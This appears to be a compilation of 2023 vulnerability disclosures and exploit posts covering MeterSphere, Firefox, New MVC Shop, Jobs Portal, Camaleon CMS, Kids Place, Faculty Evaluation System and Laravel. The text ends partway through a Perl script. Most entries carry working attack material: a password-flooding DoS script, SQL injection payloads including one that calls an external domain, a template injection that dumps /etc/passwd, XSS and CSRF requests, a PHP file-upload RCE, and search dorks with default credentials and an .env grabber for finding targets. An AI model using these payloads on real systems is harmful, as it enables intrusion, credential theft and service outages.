MeterSphere is an open source continuous testing platform. Version 2.9.1 and prior are vulnerable to denial of service. ?The `checkUserPassword` method is used to check whether the password provided by the user matches the password saved in the database, and the `CodingUtil.md5` method is used to encrypt the original password with MD5 to ensure that the password will not be saved in plain text when it is stored. If a user submits a very long password when logging in, the system will be forced to execute the long password MD5 encryption process, causing the server CPU and memory to be exhausted, thereby causing a denial of service attack on the server. This issue is fixed in version 2.10.0-lts with a maximum password length.

****一、** **测试环境****

**测试环境为VMware\*\*\*\*®** **Workstation 17 Pro**\*\*：Ubuntu 22.04.2\*\*

**版本如下所示：**

****二、** **漏洞设计程序代码位置********代码位置：****

.\\MeterSphere-main\\framework\\gateway\\src\\main\\java\\io\\metersphere\\gateway\\service\\UserLoginService.java

****三、** **详细报告****

.\\MeterSphere-main\\framework\\gateway\\src\\main\\java\\io\\metersphere\\gateway\\service\\UserLoginService.java

    public boolean checkUserPassword(String userId, String password) {
        if (StringUtils.isBlank(userId)) {
            MSException.throwException(Translator.get("user\_name\_is\_null"));
        }
        if (StringUtils.isBlank(password)) {
            MSException.throwException(Translator.get("password\_is\_null"));
        }
        UserExample example = new UserExample();
        example.createCriteria().andIdEqualTo(userId).andPasswordEqualTo(CodingUtil.md5(password));
        return userMapper.countByExample(example) > 0;
    }

​ checkUserPassword 方法用于检查用户提供的密码是否与数据库中保存的密码匹配，其主要实现流程如下：

1.  先检查输入的用户 ID 和密码是否为空，为空则抛出异常。
2.  然后新建一个 UserExample 对象，并通过该对象设置查询条件（id等于 userID，password等于 password 的md5值）。
3.  最后调用 userMapper.countByExample 方法得到满足条件的记录数并返回。

其中，CodingUtil.md5 方法用于将原始密码进行 MD5 加密处理，以保证密码在存储时不会被明文保存。如果我们在登陆时提交一个非常长的口令，就会迫使系统执行长口令MD5加密过程，导致服务器CPU及内存耗尽，从而对服务器造成拒绝服务攻击，这可能导致服务器长时间宕机，即无法使用或无响应

****四、** **POC********环境搭建：****

根据在gitee社区的指导文件进行搭建

参考链接：https://gitee.com/fit2cloud-feizhiyun/MeterSphere

****POC**流程：******代码逻辑：****

​ 我们使用 python 语言，通过生成随机长字符串模拟随机长口令，之后我们依次循环地向服务器发送短口令和长口令，短口令是为了证明程序响应时间正常，长口令是为了验证该程序存在的拒绝服务攻击，在发送长口令的同时，我们还会在浏览器进行正确账户的登录，以此验证此次攻击确实会造成服务器宕机。

****POC**代码：**

​ 代码中 headers 字段是使用Wireshark抓包正常登陆时的HTTP请求包得到的字段。

#!/usr/bin/python3
import requests
import json

url \= "https://www.metersphere.com/login"
headers \= {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:83.0) Gecko/20100101 Firefox/83.0", "Accept": "application/json, text/plain, \*/\*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=UTF-8", "Origin": "https://www.metersphere.com/login", "Connection": "keep-alive", "Referer":"https://www.metersphere.com/login"}

for i in \[1,10,1,50,1,100,1,200,1,300\]:
    passwd \= "adbce12345" \* i \* 10000
    data \= json.dumps({"userName": "17860760750", "userPassword": f"{passwd}",})
    r \= requests.post(url, headers\=headers,  data\=data,timeout\=999)
    print(f"密码长度：{i} 十万")
    print("响应时间：",r.elapsed.total\_seconds())
    print("-"\*20)

****POC**结果：**

​ 可以看到，随着口令长度的增加，服务器处理响应请求的时间也会增加，由此可以看出，只要口令足够长，那么服务器也会宕机很长时间。

**五、修复方案**

一种可能的修复方案是在前端输入框内限制输入数据的长度，另一种可能的修复方案是在后端代码中添加 password 最大长度限制。总之，只要限制了 password 最大长度，该问题就可以解决。

CVE-2023-32699: metersphere存在DoS漏洞

PrinterLogic build version 1.0.757 suffers from authentication bypass, cross site request forgery, cross site scripting, session fixation, insufficient checks, impersonation, remote SQL injection, and various other vulnerabilities.

PrinterLogic Build 1.0.757 XSS / SQL Injection / Authentication Bypass

Gentoo Linux Security Advisory 202305-35 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions greater than or equal to 102.10.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-35  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: May 30, 2023  
     Bugs: #895962, #903618, #905889  
       ID: 202305-35

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
Package                 Vulnerable      Unaffected  
----------------------  --------------  ---------------  
www-client/firefox      < 102.10.0:esr  >= 102.10.0:esr  
                        < 112.0:rapid   >= 112.0:rapid  
www-client/firefox-bin  < 102.10.0:esr  >= 102.10.0:esr  
                        < 112.0:rapid   >= 112.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.10.0:esr"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.10.0:esr"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-112.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-112.0:rapid"

References  
=========  
[ 1 ] CVE-2023-0767  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0767  
[ 2 ] CVE-2023-1945  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1945  
[ 3 ] CVE-2023-1999  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1999  
[ 4 ] CVE-2023-25728  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25728  
[ 5 ] CVE-2023-25729  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25729  
[ 6 ] CVE-2023-25730  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25730  
[ 7 ] CVE-2023-25731  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25731  
[ 8 ] CVE-2023-25732  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25732  
[ 9 ] CVE-2023-25734  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25734  
[ 10 ] CVE-2023-25735  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25735  
[ 11 ] CVE-2023-25737  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25737  
[ 12 ] CVE-2023-25738  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25738  
[ 13 ] CVE-2023-25739  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25739  
[ 14 ] CVE-2023-25742  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25742  
[ 15 ] CVE-2023-25746  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25746  
[ 16 ] CVE-2023-25748  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25748  
[ 17 ] CVE-2023-25749  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25749  
[ 18 ] CVE-2023-25750  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25750  
[ 19 ] CVE-2023-25751  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25751  
[ 20 ] CVE-2023-25752  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25752  
[ 21 ] CVE-2023-28159  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28159  
[ 22 ] CVE-2023-28160  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28160  
[ 23 ] CVE-2023-28161  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28161  
[ 24 ] CVE-2023-28162  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28162  
[ 25 ] CVE-2023-28163  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28163  
[ 26 ] CVE-2023-28164  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28164  
[ 27 ] CVE-2023-28176  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28176  
[ 28 ] CVE-2023-28177  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28177  
[ 29 ] CVE-2023-29533  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29533  
[ 30 ] CVE-2023-29535  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29535  
[ 31 ] CVE-2023-29536  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29536  
[ 32 ] CVE-2023-29537  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29537  
[ 33 ] CVE-2023-29538  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29538  
[ 34 ] CVE-2023-29539  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29539  
[ 35 ] CVE-2023-29540  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29540  
[ 36 ] CVE-2023-29541  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29541  
[ 37 ] CVE-2023-29543  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29543  
[ 38 ] CVE-2023-29544  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29544  
[ 39 ] CVE-2023-29547  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29547  
[ 40 ] CVE-2023-29548  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29548  
[ 41 ] CVE-2023-29549  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29549  
[ 42 ] CVE-2023-29550  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29550  
[ 43 ] CVE-2023-29551  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29551

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-35

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-35

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Jobs Portal version 3.6 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Jobs Portal V 3.6 Insecure Settings Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/jobs-portal-job-board-laravel-script/22607607                                          |  | # Dork      : "Our partners make Milestone products more dynamic "                                                               |                "Vestibulum vel nibh et erat faucibus Category : Jobseekers, General"                                              |                "Design by: eCreativeSolutions"                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=buyer@buyer.com & pass=buyer123456 [+] https://localhost.com/admin/edit-site-settingGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Jobs Portal 3.6 Insecure Settings

Camaleon CMS version 2.7.0 suffers from a server-side template injection vulnerability.

Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)  
Exploit Author: PARAG BAGUL  
CVE: CVE-2023-30145

## Description  
Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template  
Injection (SSTI) vulnerability via the formats parameter.

## Affected Component  
All versions below 2.7.0 are affected.

## Author  
Parag Bagul

## Steps to Reproduce  
1. Open the target URL: `https://target.com/admin/media/upload`  
2. Upload any file and intercept the request.  
3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.  
4. Check the response. It should return the multiplication of 77 with the  
message "File format not allowed (dqopi49vuuvm)".

##Detection:

#Request:

POST /admin/media/upload?actions=false HTTP/1.1  
Host: target.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101  
Firefox/102.0  
Accept: /  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://target.com/admin/profile/edit  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------327175120238370517612522354688  
Content-Length: 1200  
Origin: http://target.com  
DNT: 1  
Connection: close  
Cookie: cookie

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="file_upload"; filename="test.txt"  
Content-Type: text/plain

test

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="versions"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="thumb_size"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="formats"

test<%= 7*7 %>test  
-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="media_formats"

image  
-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="dimension"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="private"

-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="folder"

/  
-----------------------------327175120238370517612522354688  
Content-Disposition: form-data; name="skip_auto_crop"

true  
-----------------------------327175120238370517612522354688--

#Response:

HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Connection: close  
Status: 200 OK  
Cache-Control: max-age=0, private, must-revalidate  
Set-Cookie: cookie  
Content-Length: 41

File format not allowed (test49test)

#Exploitation:

To execute a command, add the following payload:  
testqopi<%= File.open('/etc/passwd').read %>fdtest

Request:

POST /admin/media/upload?actions=true HTTP/1.1  
Host: target.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101  
Firefox/102.0  
Accept: /  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://target.com/admin/media  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------104219633614133026962934729021  
Content-Length: 1237  
Origin: http://target.com  
DNT: 1  
Connection: close  
Cookie: cookie

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="file_upload"; filename="test.txt"  
Content-Type: text/plain

test

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="versions"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="thumb_size"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="formats"

dqopi<%= File.open('/etc/passwd').read %>fdfdsf  
-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="media_formats"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="dimension"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="private"

-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="folder"

/  
-----------------------------104219633614133026962934729021  
Content-Disposition: form-data; name="skip_auto_crop"

true  
-----------------------------104219633614133026962934729021--

Response:

Response:

HTTP/1.1 200 OK  
Content-Type: text/html; charset=utf-8  
Connection: close  
Status: 200 OK  
Set-Cookie: cookie  
Content-Length: 1816

File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
fdfdsf)

Camaleon CMS 2.7.0 Server-Side Template Injection

An issue was discovered in the Kiddoware Kids Place Parental Control application before 3.8.50 for Android. The child can remove all restrictions temporarily without the parents noticing by rebooting into Android Safe Mode and disabling the "Display over other apps" permission.

Multiple vulnerabilities have been identified in the Kiddoware Kids Place Parental Control Android App. Users of the parent's web dashboard can be attacked via cross site scripting or cross site request forgery vulnerabilities, or attackers may upload arbitrary files to the children's devices. Furthermore, children are able to bypass any restrictions without the parents noticing.

**Vendor description**

"_Kiddoware is the world’s leading parental control solutions company with a wide range of products and  serving over 5 million families worldwide. Kiddoware is committed in helping you to protect your kids while providing you intelligence to be proactive about your childs’ online activities._"

Source: https://kiddoware.com/

**Business recommendation**

The vendor provides an update for the affected version(s) which should be installed immediately.

An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.

The issues identified in this application were part of our blog post "The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

**Vulnerability overview/description****1) Login and registration returns password as MD5 hash**

Login and registration requests return the unsalted MD5 hash of the password. This indicates that the passwords are stored in an insecure format at the server. Furthermore, MD5 hashing should not be used anymore in modern applications.

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)**

The customizable name of the child's device can be used to trigger a XSS payload in the parent web dashboard. Children might be able to attack their parents' account.

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

All requests in the web dashboard are vulnerable to CSRF attacks. The requests contain the device Id of the child device which must be known to the attacker in order to successfully attack a child. But the device Id is not considered a secret, as it is used in the URL in some requests. An attacker could have obtained the Id through the browser history.

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents send files to the child's device. The selected file is uploaded to an AWS S3 bucket and the returned URL will be transmitted to the device which will then download it. It is possible to send arbitrary files to the child's device and thereby upload arbitrary files (size restriction ~10MB) to the AWS S3 bucket. The returned link is publicly available, so it is possible to use the server to spread malware.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can remove all restrictions temporarily without the parents noticing.

**Proof of concept****1) Login and registration returns password as MD5 hash**

The "Change password" request looks as follows:

    POST /account/change_password/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    [...]
    
    old_password=c869123c&new_password=password&confirm_password=password

The response from the web server contains the hashed, unsalted password:

    {
    	"error":null,
    	"result":
    		{
    			"email":"xxxxx@example.com",
    			"hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",
    			"message":"Password successfully changed!"
    		},
    	"status":200
    } 

Proving this is an unsalted MD5 hash:

    $ echo -n "password" | md5sum -t
    5f4dcc3b5aa765d61d8327deb882cf99  -

**2) Stored XSS via device name in parent Dashboard (CVE-2023-29079) **

The device name can be changed by the child's account by sending a POST request to the API with the pushDeviceConfig method. The following payload can be used as a PoC to trigger an alert box on every page the device name is visible in the parent dashboard. Children/attackers would be able to take over their parents' accounts via this attack.

    POST /v2/api/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Content-Type: application/json; charset=utf-8
    Content-Length: 461
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.12.8
    Connection: close
    
    {
        "method":"pushDeviceConfig",
        "id":null,
        "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",
        {
            "isGPSEnabled":false,"deviceGCMRegID":"",
            "deviceUserAgeRange":3,
            "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",
            [...]
        }
    } 

**3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)**

As an example, an attacker can abuse the CSRF vulnerability to download an arbitrary file to a child's device. It is simply needed to create a form which automatically submits on page load. If a parent is logged in the web dashboard and visits  this malicious site, the authenticated request will be sent and the file specified in the URL parameter will be downloaded by the child's device.

    POST /account/push_content/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 75
    Connection: close
    
    url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  

**4) Arbitrary File Upload to AWS S3 bucket**

The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket and push it to the child device.

    POST /account/push_content_file/ HTTP/1.1
    Host: kidsplace.kiddoware.com
    Cookie: [...]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551
    Origin: https:// kidsplace.kiddoware.com
    Content-Length: 296
    [...]
    
    -----------------------------27687116714103572458683268551
    Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"
    Content-Type: text/plain
    
    <eicar-file>
    -----------------------------27687116714103572458683268551--

The upload of the eicar file worked without errors and could subsequently also be downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

**5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)**

The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions. 

For example, previously locked apps can now be used. To notice the problem, the parent has to check the parent's dashboard manually, a notification is not sent. If the child turns the permission back on in the meantime, the bypass will go unnoticed.

**Vulnerable / tested versions**

The following version has been tested and downloaded through Google Play store, which was the most recent version available at the time of the test:

*   3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

**Vendor contact timeline**

CVE-2023-28153: Multiple Vulnerabilities in Kiddoware Kids Place Parental Control Android App

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin@admin.com/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=save\_user

Loophole location: Faculty Evaluation System's "/eval/ajax.php?action=save\_user" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /eval/ajax.php?action\=save\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/eval/index.php?page=edit\_user&id=1
Content-Length: 818
Content-Type: multipart/form-data; boundary=---------------------------1037163726497
Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r
Connection: close
\-----------------------------1037163726497
Content-Disposition: form-data; name="id"
1
\-----------------------------1037163726497
Content-Disposition: form-data; name="firstname"
Administrator
\-----------------------------1037163726497
Content-Disposition: form-data; name="lastname"
a
\-----------------------------1037163726497
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------1037163726497
Content-Disposition: form-data; name="email"
admin@admin.com
\-----------------------------1037163726497
Content-Disposition: form-data; name="password"
\-----------------------------1037163726497
Content-Disposition: form-data; name="cpass"
\-----------------------------1037163726497--

The uploaded file path has returned in response.

The files will be uploaded to this directory \\eval\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_task.php?id=

Vulnerability location: /eval/admin/manage\_task.php?id=, id

Vulnerability sql: $qry = $conn->query("SELECT * FROM task_list where id = ".$_GET['id'])->fetch_array();

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_task.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-33439: bug_report/SQLi-1.md at main · F14me7wq/bug_report

Laravel version 10.11 suffers from database disclosure and information leakage vulnerabilities.

====================================================================================================================================  
| # Title     : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://laravel.com/                                                                                               |    
| # Dork      : db_password filetype:env                                                                                           |  
                "Whoops! There was an error."                                                                                      |  
====================================================================================================================================

note : 

[+] 1 : 

 Laravel's default .env file contains some common configuration values that may differ based on whether your application   
is running locally or on a production web server. These values are then retrieved from various Laravel configuration files   
within the config directory using Laravel's env function.

[+] 2 :  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+] Poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )

[+] https://127.0.0.1/lala/.env 

====================================================================================================================================  
| # Title     : Laravel 10.11 sensitive information disclosure Vulnerability                                                       |  
====================================================================================================================================

poc : 

[+]  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+]  Dorking İn Google Or Other Search Enggine .

[+]  https://127.0.0.1/lalaland/categorie/avant_apres/

[+]  https://youtu.be/tz_w563Nyac  

====================================================================================================================================  
| # Title     : Laravel 10.11 Database Disclosure Exploit                                                                          |  
====================================================================================================================================

poc :

[-] Download the configuration file:

    The following Perl exploit will attempt to download the .env file  
    The .env file contains some common configuration values and connection information to the script database  
    Through the code you can control where to save the downloaded file .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/.env \n";  
print "[+] usage2 : perl $0 localhost /.env \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File=".env";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
